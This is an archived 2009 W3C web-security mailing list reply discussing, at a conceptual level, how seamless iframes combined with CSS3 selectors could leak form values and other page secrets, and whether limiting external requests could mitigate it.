W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Adam Barth <w3c@adambarth.com>
Date: Tue, 8 Dec 2009 01:38:24 -0800
Message-ID: <7789133a0912080138s518cc807u92565d15c930f238@mail.gmail.com>
To: gaz Heyes <gazheyes@gmail.com>
Cc: Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
On Tue, Dec 8, 2009 at 1:35 AM, gaz Heyes <gazheyes@gmail.com> wrote:
> 2009/12/8 Adam Barth <w3c@adambarth.com>
>>
>> That seems to address the proximate issue, but it feel like
>> blacklisting.  Are there other related attacks we're not thinking of
>> that would make sense to address at the same time?
>
> Well my POC used a dictionary attack to get the value of the first name text
> field. There could be information disclosure issues in future. These could
> be mitigated by limiting the amount of external requests.

I doubt that limiting the external requests is a viable approach.  I'm
not aware of any success stories about preventing exfiltration in the
web platform.  The platform just has way too many ways to send data.

As for other variation, how do these selectors interact with
contentEditable, for example?  Also, what about confidential
information written in the page, like account numbers or social
security numbers?  I don't see why all the secrets must necessarily be
stored in value attributes of input elements.

Adam
Received on Tuesday, 8 December 2009 09:39:17 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT